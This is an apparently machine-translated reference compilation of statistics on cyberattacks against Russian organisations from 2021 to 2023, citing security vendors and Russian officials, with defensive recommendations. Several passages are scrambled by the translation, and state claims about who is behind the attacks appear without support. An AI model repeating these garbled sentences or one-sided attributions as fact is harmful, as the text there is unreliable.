The number of cyber attacks in Russia and in the world

The main articles are:

• Cybercrime and cyber conflicts: Russia
• Cybercrime in the world

The number of cybercrimes in Russia

Main article: The number of cybercrimes in Russia

2023

The number of cyber attacks on Russian IT companies has grown 4 times

The number of cyber attacks on Russian IT companies in the second quarter of 2023 increased 4 times compared to the same period in 2022 and reached 4 thousand. This was reported at the end of August 2023 in MTS RED.

Information security companies Positive Technologies and Kaspersky Lab confirmed to Kommersant the growing activity of hackers in relation to the IT-Business in the Russian Federation. So, according to estimates by Positive Technologies, the share of IT companies in the total number of attacked almost tripled, to 17%. Gazinformservice notes an increase in attacks on IT companies by 20-25% with a total market share of 10-15%. As noted in the Kaspersky Lab cybersecurity monitoring center, in Russia and the CIS, the IT market remains in the top three industries most attacked by hackers.

According to Artem Izbaenkov, director of cybersecurity development for EdgeÖåíòð (cloud solutions), attacks on IT companies are aimed primarily at paralyzing the network infrastructure, which can lead to serious disruptions in the work of companies, loss of the client base and complete shutdown. Cyber ​ ​ attacks can also be used "to achieve geopolitical goals and manipulate public opinion," the expert said.

The vulnerability of Russian companies to hackers is associated with a lack of IT specialists in the market to ensure full protection, import substitution of significant systems and the transition to OpenSource (open source) products, believes Dmitry Ovchinnikov, chief specialist of the integrated information protection systems department at Gazinformservice.

Before blocking the accounts of Russian developers on foreign repositories, many IT companies actively took their developments, but now foreign open source products in Russia are not updated, which has led to an increase in vulnerabilities in the infrastructure of organizations, - said[1]

The number of cyber attacks in the first half of the year approximately doubled

MTS RED on July 21, 2023 announced that the number of cyber attacks in the first half of 2023 approximately doubled compared to the same period in 2022. At the same time, the number of incidents critical in terms of consequences for business decreased by about 20%. According to the MTS RED study, their share in the total volume of cyber attacks was 22%, while in the first half of 2022 there were slightly less than half of such incidents - 46%. Thus, on average in Russia, the number of attacks continues to grow, and their level is decreasing. However, in a number of industries, MTS RED analysts record the opposite situation.

As in 2022, the most attacked industries in the first half of the year were information technology (35%), industry (21%) and retail (15%). According to statistics from the MTS SOC Cyber ​ ​ Attack Monitoring and Response Center, they experienced from 500 to 1000 malicious cyber effects of various levels of complexity every month. The largest number of incidents in these industries was due to attempts by cybercriminals to bypass the means of protection of organizations (37%). In second place with shares of about 15% - violation by employees of information security policies, infection with malware and attempts to hack user accounts.

In early 2022, simple and aggressive attacks on the external IT perimeter of organizations, as well as phishing emails on company employees, prevailed. In 2023, the total number of significant attacks decreased, as companies began to be more attentive to cybersecurity, closing critical vulnerabilities in information systems or using superimposed security tools and cybersecurity services, - commented on the results of the study Andrei Dugin, director of the MTS RED cybersecurity services center.

In addition, retail and industrial enterprises were subjected to the largest number of highly critical attacks. The share of retail in the total number of such incidents was 27%, about 40% of all attacks on this industry were critical. Analysts attribute this to the high level of digitalization in this area and the dependence of key retail business processes on the normal functioning of IT systems. As a result, retail companies are more vulnerable to cyber threats - in terms of possible damage to them, a larger number of different types of attacks are critical.

Banks and telecom have been exposed to malicious cyber activity less often than other industries. If in the first half of 2022 they took 3rd and 4th place in the list of the most attacked, then in 2023 they accounted for a total of no more than 10% of attacks. However, these industries were more likely than many others to be targeted by professional malefactors.

81% of all information security incidents recorded in telecom companies were recognized as highly critical. Compared to the first half of 2022, their number has approximately doubled. The share of such attacks in banks is 27%, the financial sector ranks third in this indicator.

Media and organizations working in the field of servants took a small share in the total volume of attacks - 11% and 7%, respectively. However, in general, they began to attack more than five times more often than in 2022.

FSB information security center records more than 170 cyber attacks on Russia every day

More than 170 complex computer attacks are recorded daily on information Russian resources, said Nikolai Murashov, deputy director of the National Coordination Center for Computer Incidents (NCCCI), on May 25, 2023.

In connection with the special operation against the Russian Federation, an unprecedented struggle is being waged on the Internet, "he says. - They are held from various points of the globe and are clearly coordinated. On an ongoing basis, state-authorized bodies monitor more than 35,000 information resources.

According to Murashov, NCCCI is the body that is given the right to inform foreign partners, as well as receive information about computer incidents from abroad. According to the indicators of 2023, according to the requests of the center, the activities of more than 7100 malicious resources were terminated. More than 6,500 domain names have ceased to exist, said the deputy head of the National Coordination Center for Computer Incidents.

There is an increase in the speed of implementation of threats: from the moment information about threats appears, for example, the publication of information about vulnerabilities, to its practical implementation takes no more than a few hours, - said Murashov in February 2023.

As the NKCKI specialists have established, hackers are agitating for cyberattacks through Telegram channels, distributing the necessary tools and instructions for this.

They are carried out cyber attacks from Russia different countries, but their focus is mainly traced from, USA countries NATO and, Ukraine said in February 2023 the special representative of the President of the Russian Federation for international cooperation in the region, information security director of the international security department of the Ministry of Foreign Affairs. The Center Andrei Krutskikh^[2]

2022

The total number of cyber attacks increased by 21% over the year

Positive Technologies specialists analyzed the current cyber threats of 2022. The total number of incidents increased by 21% compared to 2021. One of the main trends was an increase in the number of incidents related to web resources, the emergence of vipers, as well as an increase in the cross-industry consequences of attacks on IT companies. The company announced this on March 29, 2023.

Among organizations, state institutions (17%), medical institutions (9%) and industry (9%) were most often victims of attacks. In most of these cases, attackers used malware (54%), social engineering (43%) and exploited vulnerabilities (34%).

The share of successful attacks aimed at web resources of organizations has increased. If in 2021 official sites were compromised in 17% of cases, then in 2022 the share of such incidents was 22%. The greatest blow fell on government agencies: the number of incidents related to attacks on web resources more than doubled, and their share increased from 23% to 41%. We expect such attacks to continue in 2023. They pose a particular danger to companies providing online services and providing the possibility of online payment: attackers can embed malicious code into sites to intercept personal and payment data.

Encoders remain the most popular type of malicious ON among attackers. In 2022, criminals used ransomware in every second successful attack on organizations (51%). The most common consequences of such incidents were violation of the main activity (79%) and (sensitive data leaks 55%). In 12% of incidents, companies suffered direct financial losses. Many groups rewrote the HPE used in cross-platform languages programming ​ ​ and created versions aimed at both systems Windows Linux. The spread of HPW for removal (data wipers) is becoming a trend: the increase in the number of incidents using wipers amounted to 175% of the indicators of 2021.

In 2022, the interest of cybercriminals in cryptocurrency increased significantly. The number of successful attacks on blockchain projects has more than doubled compared to 2021. In 78% of incidents, attackers managed to steal funds, with damage in some cases amounting to several hundred million dollars. Private users became victims of social engineering attacks: attackers spread messages on social networks and instant messengers about the free distribution of tokens and NFTs, and also offered to transfer funds, promising to return much more assets than was invested. Positive Technologies analysts believe that in 2023, the number of cases of fraud directed at holders of cryptocurrency assets will increase.

Social engineering is still at its best. In successful attacks on organizations, the share of use of this method is 43%, on individuals - 93%. Attackers actively used the phishing as a service model phishing. In addition, even the low-skilled cybercriminals could carry out large-scale attacks: ready-made phishing kits helped them in this.

The year passed under the sign of mass leaks: during the entire period, Positive Technologies experts recorded reports of data compromise. Most often, medical institutions became the source of leaks: in 82% of incidents, attackers managed to steal confidential information, mainly these were personal data of clients of medical institutions. In organizations engaged in scientific research or providing educational services, this figure was 67%, and in retail - 65%. Coupled with massive leaks, attacks aimed at bypassing multifactor authentication are gaining popularity. This could lead to an increase in the number of incidents in 2023.

In 2022, the number of incidents in which espionage was used ON was constantly increasing. As a result, this figure was 43% in attacks on individuals. Most often, attackers distributed spyware through phishing sites (42%) and (email 20%).

The number of successful attacks directed at IT companies gradually grew, and in the IV quarter of 2022 their number almost doubled the indicators of the I quarter. Most often, incidents led to leaks of confidential information (63%), violation of core activities (35%), the use of company resources to carry out attacks (13%). Such large organizations as Globant, Microsoft, Nvidia, Samsung became victims of attackers. Attacks on IT companies had intersectoral consequences: both by subsequent hacking of customer infrastructure and by violating customer business processes. For example, people could not receive a number of services from medical and government agencies due to an attack on an IT solution provider.

{{quote 'We expect the number of attacks targeting IT companies to continue to grow in 2023. This can affect the clients of such organizations, as well as lead to unacceptable consequences for other industries, - said Ekaterina Semykina, an analyst at the Positive Technologies research group. - IT solution developers need to verify unacceptable events. We strongly recommend that you regularly analyze code for security and check third-party open source libraries used in development. }}

The number of cyber attacks by financially motivated hackers in Russia has tripled over the year

On March 17, 2023, the company Group-IB announced that it had investigated high-tech crimes of 2022 based on conducted responses to incidents the Russian in companies. According to the study, in 2022 the number cyber attacks financial and motivated hackers almost tripled compared to 2021. The most popular type of cyber threats encountered during reactions by experts computer from the Group-IB Forensic Laboratory were attacks using - programs extortioners they accounted for 68% of all incidents. More. here

The number of cyber attacks on Russian companies has doubled and reached 911 thousand.

In 2022, 911 thousand hacker attacks were committed on Russian companies, which is twice as much as a year earlier. Such data "Rostelecom-Solar" published on February 20, 2023.

The study of experts covers 280 organizations from various industries, including the public sector, finance, power, telecom, media, and large retail. This statistic does not include massive DDoS attacks.

According to information security specialists, against the background of the general growth of attacks in the second half of the year, their number decreased from hacktivists - unprofessional hackers acting for political rather than commercial reasons using simple tools, for example, massive DDoS attacks or attacks on web servers. For example, if in the first half of the year the share of hacktivist attacks on web servers in Russia was 11% of all incidents, then in the second half of 2022 - only 1%.

If we talk about 2022 as a whole, then it began with massive "carpet bombing" in cyberspace - Russian companies have not encountered such a thing before (in fact, no one in the world has come across it). The attacks were chaotic, aimed at absolutely any industry and organization. The goal of the attackers was the Russian infrastructure in principle. But by the middle of the year, mass attacks retreated, and they were replaced by more targeted attacks, "said Daria Koshkina, head of cyber threat analytics at Rostelecom-Solar.

The study says that by the end of 2022, the number of network attacks increased in Russia. Often, perimeter or web scanning and attempts to compromise accounts are carried out by automated tools that hackers use to spy on the client. Despite the low level of criticality of such incidents, this is a dangerous call for companies, which indicates that they are attractive to attackers. This means that they need to continue the trend towards strengthening their cyber defense, the Rostelecom-Solar said^[3]

Cyber attacks on IT companies through spyware have increased

The number of cyber attacks on Russian IT companies in the fourth quarter of 2022 increased by 18% compared to the previous three months. At the same time, in 62% of cases, hackers used malicious software, mainly ransomware programs aimed at stealing confidential information and obtaining a ransom. This is stated in a study that Positive Technologies published on February 17, 2023.

Experts noted the share of spyware attacks: in October-December 2022, 17% of such attacks were committed against organizations, 49% against individuals; this is 5 pp and 3 pp, respectively, more than the indicators of the third quarter of 2022. Attackers create new malware and work to expand their functionality: for example, the new Aurora styler has a function of stealing data not only from browsers or the clipboard, but also directly from the device's disk.

The spread of spyware viruses according to the "malware as a service" scheme allows even inexperienced attackers to use them: Positive Technologies researchers analyzed the new BlueFox styler, which is actively promoting this scheme in the underground market. In addition, cases of embedding malicious code that performs spyware functions into Python ON developer packages have become more frequent - this can lead to an increase in the number of supply chain attacks. A cyber attack in which attackers hack a company by compromising software or hardware vendors. For example, criminals can inject malicious code into the source code of a product or distribute malicious updates to infect the infrastructure of the target organization. and compromising IT networks.^[4]

The number of cyber attacks on the Russian public sector has grown several times

In 2022, the number of attacks on the Russian public sector approximately doubled or tripled compared to a year ago. About this "Vedomosti" told an analyst of the data of the cybersecurity monitoring center IZ: SOC of the company "Informzaschita" Shamil Chich (the publication was published on January 16, 2023).

A multiple increase in the number of attacks on government agencies since February 2022 was confirmed to the newspaper by Alexei Pavlov, Business Development Director of the Solar JSOC Cyber ​ ​ Attack Counteraction Center of RTK-Solar. As Shamil Chich noted, in connection with the political situation, the so-called hacktivists were added to the hackers, who were massively recruited in social networks and Telegram channels. Their activity was aimed mainly at government agencies and significantly increased the number of attacks, he continued. The main vectors were DDoS and web attacks on the public resources of government agencies, Pavlov added. The goal of the attackers, according to him, is to create additional tension in society through defacements (replacing one web page with another with the publication of a message from hackers), the inaccessibility of resources significant to the population and user data leaks.

Roskomnadzor (RKN) is responsible for the cybersecurity of the Russian segment of the Internet. The agency filters malicious traffic, preventing DDoS attacks on all Russian Internet resources. The ILV told the publication that with the help of technical means to counter threats at cross-border communication nodes, "thousands" of attacks on the information resources of federal and regional authorities, the portal of public services, etc.

According to SearchInform, in 2022, the budget for information security was increased by 26% of government agencies, 52% of the budget remained unchanged, 12% noted its decline. The funds went to extend licenses, as well as the purchase of hardware and software.^[5]

For the year, the number of recorded attacks on the public sector amounted to 403 attacks

Positive Technologies experts highlighted the main events in the field of cybersecurity for 2022 and gave a forecast of what threats should be expected in 2023. Representatives of Positive Technologies shared information about this on January 13, 2023. Experts' assessments are based on global data, the company's own expertise, the results of investigations, as well as on data from authoritative sources.

In 2022, all key sectors of the economy attracted the attention of cybercriminals. Thus, Positive Technologies experts note the following:

• The public sector - was the No. 1 target. In the first quarter of 2022, the number of attacks aimed at government agencies almost doubled compared to the last quarter of 2021, and then continued to grow throughout the year. Government agencies faced the largest number of cyber attacks among organizations: their share of the total number of attacks was 17% - this is 2 pp more than in 2021. In total, 403 attacks were recorded in 2022, which is 25% more than in 2021. The public sector was the target of many criminal groups (both ransomware and APT groups), including Cloud Atlas, Tonto, Gamaredon, MuddyWater, Mustang Panda. Attackers used malware in almost every second attack on government agencies. The most popular types of malware were ransomware (56% among HVE attacks) and malware for remote control (29%).
• Industry - Hackers seek to stop technological processes. In 2022, almost every tenth attack on organizations occurred in industrial enterprises. In total, 223 attacks on industrial companies were recorded over the year, which is 7% more compared to 2021. The main blow to industry fell on the second quarter, when the total number of attacks on organizations in the industrial sector increased by 53% due to the increased activity of ransomware.

Almost half of the attacks used social engineering, in 41% of cases, attackers exploited vulnerabilities in the software. Most of the attacks (71%) used malware, which was distributed mainly through compromising resources on the perimeter of organizations (49%) and e-mail (43%). For the third year in a row, we have noted a decrease in the share of use of social engineering and an increase in the share of exploitation of protection deficiencies on perimeter resources. commented Dmitry Darensky, Head of Industrial Cybersecurity Practice, Positive Technologies

• Medicine is the leader in data breaches. For the fifth year in a row, medical institutions have remained in the top three most attacked industries: in 2022, the share of attacks on them was 9% among all organizations, and the number of attacks is approximately at the level of 2021. Medical institutions most often became a source of data leaks among organizations. In more than 80% of cases, attacks led to leaks of customer data (mainly personal data and medical information). The systems of medical institutions contain large amounts of data, and usually criminals can receive a full name, date of birth, physical address, phone number, account details and card numbers, insurance information, driver's license number, email address, medical history, health data and other medical information.
• The financial sector is the best preparation for attacks, but in general the level of protection is insufficient. At the end of 2022, the total number of attacks on financial organizations decreased by 7% compared to the same period in 2021. The share of attacks on the financial industry in recent years has generally decreased and for 2022 was about 4% of the number of all attacks on organizations. Although the financial sector is best prepared for attacks compared to other companies, in general, its level of protection from an internal and external attacker remains not high enough. Among the financial organizations studied from 2021 to 2022 as part of an external pentest, Positive Technologies experts in 86% of cases managed to gain access to the local network, and in half of these companies, in the event of a real attack, even an attacker who did not have a high degree of training could penetrate the internal network. When conducting an internal pentest in all cases, experts managed to gain full control over the infrastructure, as well as demonstrate the possibility of gaining access to critical systems: for example, a vulnerability was identified in one of the banks that allowed compromising more than 1000 ATMs. As a rule, when conducting verification beyond the limited scope of work, more than 70% of the indicated events can be realized.
• IT companies - caution in the use open source software and control of supply chains. The number of attacks on IT companies in 2022 decreased slightly compared to 2021, but they still account for 6% of attacks on organizations. During the year, the company observed major attacks aimed at IT companies. For example, in February 2022, Lapsus $ was attacked American by a graphic developer, and in processors Nvidia early March 2022 it was under attack, Samsung it was stolen. source code Samsung Galaxy In addition, companies such as,,,,,, were hacked. Okta Microsoft Cisco AMD Cloudflare Twilio LastPass Almost with the same frequency, attacks on IT companies used techniques, social engineering compromising credentials and exploiting vulnerabilities on the perimeter. In every third case, they were seen. programs encoders
• Science and education are under attack from ransomware. Institutions from the field of science and education are among the top 5 most frequently attacked organizations. The number of attacks on them is comparable to the results of 2021. In more than half of the cases, attackers were able to steal confidential information, mainly personal data of users. In every second attack, ransomware was used, and the main goal of the criminals was to obtain a ransom from an educational institution. In 59% of cases, attackers resorted to social engineering methods against employees, and in 25% of attacks, organizations selected credentials or used compromised passwords to access resources. In every fifth attack, attackers exploited vulnerabilities in the software. In 2022, the share of attacks on web resources increased: from 11% to 20%.
• Users - large-scale data breaches. The number of attacks on individuals increased by 44%. Ordinary users accounted for 17% of all attacks. Traditionally, the main vector of attack is the various techniques of social engineering, which were used in 93% of cases. To carry out such attacks, attackers created phishing sites (56%), sent malicious letters by (e-mail 39%), searched for victims in (social networks 21%) and (18 messengers %).

In 2023, Positive Technologies experts predict:

• The rise of hacktivism aimed at state institutions. It can lead to negative consequences - from defusing sites to destroying infrastructure.
• Attacks on medical institutions and their clients: theft of confidential data, phishing attacks on patients, pressure from ransomware, incidents aimed at hacking services and applications used to provide remote medical services.
• Changing the landscape of threats to industry: the targets of criminals will often not be financial benefits or large ransom amounts, but interruptions in the activities of enterprises, accidents, and the shutdown of critical technological processes. There are also positive trends: an understanding of information security as a tool for ensuring sustainability comes, projects for the modernization and construction of production facilities already include cybersecurity solutions protected by I&C from suppliers by default, "non-invasiveness" is a thing of the past, industry regulation and competence centers are developing. The industry is moving towards the practical protection of its assets, and interest in comprehensive means of protection, which ensure the implementation of primarily applied security tasks of enterprises, is naturally growing.
• The emergence of clones of online banks and attacks on financial companies through integrable systems.

In order not to encounter clones of online banks, you need to manually and automatically monitor and search for them and phishing sites (mobile applications) of financial companies. From attacks through integrable systems, Positive Technologies experts recommend analyzing the security of all related systems, developing internal security teams, creating conditions for prompt response to incidents, limiting access that is not required for the operation of an integrable system. told Maxim Kostikov, Head of Application Security Analysis, Positive Technologies

• The growth of attacks on cloud service providers, the continuation of attacks on software and service supply chains, the need for IT companies to monitor the security of specialized environments intended for development, as well as used open source libraries.
• The development of attacks on online learning services, the continuation of ransomware attacks on the field of science and education, and attackers will pursue different goals: theft of research developments, personal and user credentials.
• Improving attack schemes on users using social engineering. In 2022, users became victims of large-scale data leaks. This will allow attackers to improve attack schemes using social engineering: criminals will be able to carry out attacks more pointwise, having detailed information about the actions of the victim in compromised services. Due to the distribution of ready-made kits for conducting mass phishing attacks, the activity of attackers against individuals will significantly increase, especially against customers of online banks and other online services. Experts also predict an increase in the number of attacks on users on social networks and instant messengers, as well as an increase in the number of attacks on the second authentication factor, which is used by users to log into many services.

Guided by the principles of effective security, we recommend focusing on protecting against those threats that will lead to unacceptable events. Given the forecasts, first of all, this is a violation of key technological and business processes, leakage of confidential user data, the possibility of developing an attack on the company's customers. The prevention of such events largely depends on the timely detection and response to threats, and this requires the constant development of your own security teams or the involvement of external information security specialists, monitoring information security events, especially for critical systems, proactive search for threats to eliminate the long stay of attackers in corporate systems. It is crucial to have reliable backup tools and fine-tuned recovery process that will allow the organization to resume its main activities in the event of an attack as soon as possible. Sharing information security experience with other companies in your industry will increase its overall security, but you should also think about the cross-industry consequences of attacks and their prevention. comments Fyodor Chunizhekov, Research Group Analyst, Information Security Analytics Department, Positive Technologies

Russian Foreign Ministry: The number of cyber attacks on Russia increased by 80%

At the end of December 2022, the Ministry of Foreign Affairs (MFA) of the Russian Federation spoke about the surge in cyber attacks on Russia. The largest number of hacker attacks are directed at the public sector, said Oleg Syromolotov, deputy head of the department.

Against the background of a special military operation, our country faced unprecedented external aggression in the information space. In 2022, the number of cyber attacks on Russia increased by 80%, he said in an interview with RIA Novosti.

According to him, in 2021, the main goal of cyber attacks was financial institutions, but in 2022 they became state organizations, including critical information infrastructure facilities and socially significant institutions.

According to the Deputy Foreign Minister of the Russian Federation, the overwhelming majority of cyber attacks against Russia are carried out from the territory of NATO, EU, as well as Ukraine. He stressed that Ukraine has turned into a bridgehead for the West to test cyber developments against Russia.

An illustrative example: after the neutralization of Ukrainian call centers against the background of a special military operation, the number of fraudulent calls to Russian citizens decreased fivefold, Syromolotov said.

On December 10, 2022, Syromolotov announced that the United States plans to spend more than $11 billion on cyber attacks by objectionable governments in 2023.

In December 2022, the Politico newspaper wrote that NATO countries intend to use cyber forces and the latest technologies in the Ukrainian conflict to counter Russia. The article notes that new technologies have been tested on them, including the adaptation of the use of artificial intelligence technologies.

On October 24, 2022, Deputy Prime Minister Dmitry Chernyshenko said that "cyber warfare of unfriendly countries" was fighting against the country. In this regard, cyberstabs were organized in all executive bodies and throughout critical infrastructure.^[6]

The number of cyber attacks on automated control systems in Russia soared by 80%

On September 20, 2022, Kaspersky Lab experts published a study in which they reported an increase in the number of targeted cyber attacks on industrial enterprises in Russia. Most often, malicious objects penetrate computers of automated control systems (ACS) from the Internet. Read more here.

2021

Record number of zero-day threats revealed over the year

On April 28, 2022, CROC announced that it had conducted a study on Zero day threats. In 2021, a record number of zero-day threats were identified. Their number was 57 - that twice as much as in 2020, and more than in any other year on record. According to the CROC, the total number of cyber attacks increased by 23%. At the same time, there is an increase in targeted cyber attacks, their share is about 75%. Most of it occurs using malware (73%), among which zero-day threats pose a particular danger.

In ^{2021, a record number of zero-day threats were identified. Photo: securelist.ru.}

According to the company, a zero-day exploit (or zero day) is a cyber attack aimed at a software vulnerability that is unknown to its vendors or antivirus programs. An attacker notices a software vulnerability before he even discovers it, quickly creates an exploit and uses it to penetrate. Such attacks are likely to succeed. This makes zero-day vulnerabilities a major security threat.

^{Zero-Day Threats Count}

Of course, as of April 2022, hackers are exploiting unknown vulnerabilities to interfere with systems. The goals are different - industrial espionage, theft of data and money from accounts, infection of networks with ransomware and ransom, political activism and cyber terrorism. noted Dmitry Starikovich, leading expert on information security IT the CROC company

The number of threats directly correlates with the amount of software being developed. It constantly changes, as a result of which products appear, which nevertheless can contain old errors. A striking example is the Log4j vulnerability in the Java library. This library was used in a large number of IT products that are installed in almost all companies. Suddenly, many servers around the world have become vulnerable to malicious code execution.

Despite the sharp increase in the number of zero-day threats, their detection takes more and more time for attackers. Modern security systems and the complexity of IT infrastructures mean that hackers need to do much more work than five years ago. told Dmitry Starikovich, leading expert on information security of IT company CROC

If we talk about the goals of cybercriminals, then every third is hunting for (33 personal data %). Close the top three, information containing trade secrets (21%) and user credentials (19%).

^{Targets of cybercriminals}

In zero-day attacks, various vulnerable objects can be used: Operating systems, Web browsers, Office applications, Open source components; Hardware and the Internet of Things.

Operating systems are perhaps, for April 2022, the most attractive target for zero-day attacks due to their ubiquity and the capabilities they offer attackers to gain control over user systems.

Web browsers - An uncorrected vulnerability could allow attackers to boot, script, or even run executable files on users' computers.

Office applications - Malware embedded in documents or other files often exploits zero-day vulnerabilities in the underlying application used to edit them.

Open Source Components - Some open source projects are not actively supported or do not have robust security methods. Software vendors can use these components without knowing the vulnerabilities they contain.

Hardware - A vulnerability in a router, switch, network device, or home device, such as a game console, can allow attackers to compromise these devices, disrupt them, or use them to create massive botnets.

The Internet of Things (IoT) is connected devices, from household appliances and televisions to sensors and connected cars. Many IoT devices do not have a mechanism to fix or update their software.

The cost of zero-day exploits varies greatly and reaches up to $2,500,000 and this is only a reward to conscientious researchers for identifying threats on the basis of which corresponding updates are released. According to publicly available data, the cost of some vulnerabilities has increased by 1150% since 2016.

The amounts paid for the purchase of the original zero-day exploits depend on the popularity and security level of the affected software/system, as well as the quality of the presented exploit (full or partial chain, supported versions/systems/architecture). The most valuable are vulnerabilities for hacking mobile devices, and Android versions are much more valuable.

Among servers, vulnerabilities in Windows, Chrome, Apache and MS IIS systems are of greatest interest to hackers, the cost of detection can reach a million dollars. At the same time, macOS vulnerabilities are estimated at several times less (about 100 thousand).

However, many criminals look for vulnerabilities and sell them to hacker groups, which in turn use them and earn tens of times more. Losses from the famous Carbanak attack were estimated at $1 billion. In Russia, with the help of this virus, more than 58 million rubles were stolen from the Bank's PIR.

There are many high-profile cases. In 2021 Google Chrome , he was subjected to a series of zero-day attacks that caused a number of Chrome updates. The problem arose due to an error in JavaScript the V8 movement used in the web. browser A year earlier video conferencings Zoom , a vulnerability was discovered in a popular platform. As a result, attackers gained remote access to computers to users who installed older versions of the OS. In cases where the attack targeted the administrator, attackers could completely seize his device and all files.

The main task of the attacker is to gain access to the network and elevated privileges. Here we are talking about software vulnerabilities, although you need to understand that one found vulnerability is not enough. You need to access the software that contains it. Here social engineering comes to the "aid." By such methods, attackers force the victim to open a malicious letter with the application and follow the infected link. After that, the hacker software gets to the computer and tries to exploit the vulnerability. told Dmitry Starikovich, leading expert on information security of IT company CROC

Reliable detection of deviations from the expected behavior of the system can become an effective tool for preventing violations. To do this, you must adhere to the following recommendations:

• Update programs and operating systems in a timely manner. Manufacturers regularly release updates and security patches. They contain corrections to previously identified code flaws.
• Work only in the required systems. The more software the company uses, the more potential vulnerabilities there are.
• Configure the firewall. Limiting transactions will help prevent unauthorized exposure by helping to identify the threat in the initial stages.
• Development of cyber awareness. To penetrate and implement exploits, social engineering methods are used, training employees to work with data in a web environment will help ensure a serious level of security.
• Use of antivirus. End-to-end solutions help secure enterprise systems and databases.

Need to monitor events IT infrastructure in using, SIEM EDR, NTA and highlighted command. analysts SOC

It would seem that these methods are already used in all companies, but this is not the case. We had a case when we saved the customer from the threat of zero day, since he did not update his programs on time. As a result, a ransomware got to user stations. We quickly took action, promptly closed the access of the subnet in which there were infected machines from the rest of the network, thus stopping the spread of malware. Then there were attempts to recover data and reload stations from scratch. As well as an analysis of what happened - the introduction of a vulnerability management process, process analysis on workstations (EDR solution class), work with cyber-hygiene users (security awareness). supplemented by Dmitry Starikovich, leading information security expert at CROC IT company

In addition, companies need to constantly monitor the identified threats in the external space. Data Base can be both a system integrator or vendor, and open sources, for example, NVD (National Vulnerability Database). Such information is constantly updated and can be useful as a guide, zero-day exploits are by definition unknown. Thus, there is a limit to what an existing database can report.

Machine learning is increasingly used to detect data on previously recorded exploits. Based on current and past user interactions with the system, a standard of safe behavior is established. The more information is available, the more reliable the detection.

Companies of all sizes need to have an incident response strategy that provides an organized process for detecting and eliminating cyber attacks. Having a specific plan focused on zero-day threats will give an advantage if they occur, optimizes response time and increases the chances of avoiding or reducing damage.

The number of cyber attacks for the year increased by 6.5% - Positive Technologies

On April 19, 2022, Positive Technologies announced that the number of cyber attacks in 2021 increased by 6.5% compared to 2020. The share of targeted attacks compared to 2020 increased by 4 pp and amounted to 74% of the total. As in 2020, 86% of all attacks were directed at organizations. The top three most frequently attacked industries included government agencies (16%), medical institutions (11%) and industrial companies (10%). The most common attack methods among attackers are the following: the use of malware (63%), the use of social engineering methods (50%) and hacking - the exploitation of security flaws and vulnerabilities in software (32%).

Positive Technologies experts analyzed the current cyber threats of 2021, noting the dominance of ransomware among malware, an increase in the intensity of attacks on crypto exchanges, the emergence of critically dangerous vulnerabilities that were immediately exploited by attackers in many organizations around the world. These trends, as stated in the study, will be relevant for 2022.

Among the malware that was used in attacks on companies, ransomware was most often found: according to Positive Technologies, they were involved in 60% of cases, and the increase in comparison with 2020 was 15 p. In 2021, attackers began to threaten the publication of data stolen from companies if the victim turns to the police for help or hires a negotiator. This tactic has already been used by the Grief and Ragnar Locker groups.

Cybercriminals again paid special attention to cryptocurrency. According to Positive Technologies estimates, the number of attacks on crypto exchanges increased by 44% compared to 2020. In 2021, there was one of the largest cryptocurrency thefts in history - attackers stole about $600 million . USA at the PolyNetwork crypto exchange. Mostly cybercriminals exploited vulnerabilities in interaction protocols. Another method that is gaining momentum is the exploitation of web vulnerabilities on crypto platform sites.

The use of Linux is increasing every year, especially in the wake of import substitution, and this could not but take into account the attackers. Starting from the second quarter of 2021, Positive Technologies researchers noted that more and more malware developers are sharpening their HPE for attacks on Linux systems. If the infrastructure has such systems, experts recommend regular scans for malicious activity, checking files in the sandbox before they are directly launched on the system, and installing security updates in a timely manner.

In 88% of attacks on individuals, cybercriminals used social engineering methods. The topics of phishing in 2021 included the COVID-19 pandemic, premieres of films and TV series, investments, corporate mailings. The topic of investments enjoyed special attention of cybercriminals in 2021 - Positive Technologies analysts associate such interest with the influx of unprofessional investors (over the past year, more than 6 million people joined the Moscow Exchange). Already at the very beginning of 2022, Russian citizens faced phishing attacks in which attackers promise to help preserve cash savings if Russia disconnects from the SWIFT international transfer system or offer to make money on arbitration trade.

Throughout the year, Positive Technologies experts recorded the emergence of high-profile vulnerabilities that the attackers immediately involved, and hundreds and thousands of organizations around the world became their victims. Among such vulnerabilities, for example, ProxyLogon in MS Exchange, PrintNightmare in the Windows printing service, CVE-2021-40444 in the MSHTML module in Internet Explorer. In December 2021, the term "cyberpandemia" even appeared due to the abundance of attacks using the CVE-2021-44228 vulnerability in the Log4j library. In 2021, the share of hacking and exploitation of web vulnerabilities totaled 43% of all methods used in attacks on organizations, which is 8 pp more than in the previous year.

"Against the background of a difficult geopolitical situation, we predict an increase in the number of attacks, so we recommend that companies move from typical information security processes to the principles of effective security. We strongly encourage companies to focus on protecting key and target assets and intranet penetration points. You should also pay attention to the organization of the vulnerability management process in the company. The main problem faced by employees of information security departments is the prioritization of vulnerabilities for elimination. At the end of 2021, we published our recommendations to solve this problem, "- comments analyst of the Positive Technologies research group Yana Yurakova.

Cyber attacks rise 22% - Tet

Tet (formerly Lattelecom) on February 21, 2022 announced what cyber attacks and risks businesses and users had to face in 2021.

The main set of the most common threats has not changed - in 2021, the Tet team recorded 50 million spam messages, 123,500 blocked virus emails and 3,066 stopped denial-of-service (DDoS) cyberattacks, which is 22% more than a year earlier. Half of DDoS attacks attempted lasted from 1 to 5 minutes, and 1% of these attacks lasted at least an hour, which indicates the targeting and sophistication of the attacks. The power of the most serious DDoS attack blocked by Tet was 112 Gbps. At the same time, the number of malware emails identified by Tet in 2021 is 12% less than a year earlier, which may be due to less "activity" of the Emotet virus.

As predicted, in 2021 the number of cyber attacks increased significantly. There is a "steady" increase in the number of DDoS attacks, which are becoming more aggressive and large-scale. Their goal is not only individuals, but also, in most cases, companies in the field of production, e-commerce their supply chains. So, at the end of 2021, the largest DDoS attack on Russian was recorded. retailers Also in 2021, whole ones suffered from DDoS attacks. countries For example, in January 2022, a DDoS attack that lasted four days was left without for many hours. And Internet Andorra Microsoft he announced that in November 2021, the company's services were fighting a DDoS attack, the peak traffic level of which reached 3.47 terabits per second. The attack targeted an e-commerce company in and lasted Asia 15 minutes, "said Artur Filatov, head of cybersecurity services at Tet.

One of the key trends in 2021 in cyber security an area worth looking at in 2022 is zero-day attacks, which are the hardest to identify. {{quote 'One of these attacks was due to vulnerability. Log4j Using it, an attacker can remotely run any code on the target, computer which will allow him to steal, data install malicious or ON take control of the device. The Log4j vulnerability caused serious problems around the world in December 2021, without even bypassing Apple Microsoft. Unfortunately, 100% effective protection against this type of attack does not exist, but each company can mitigate the consequences and complicate the life of attackers by monitoring and correctly configuring systems, explained A. Filatov. }}

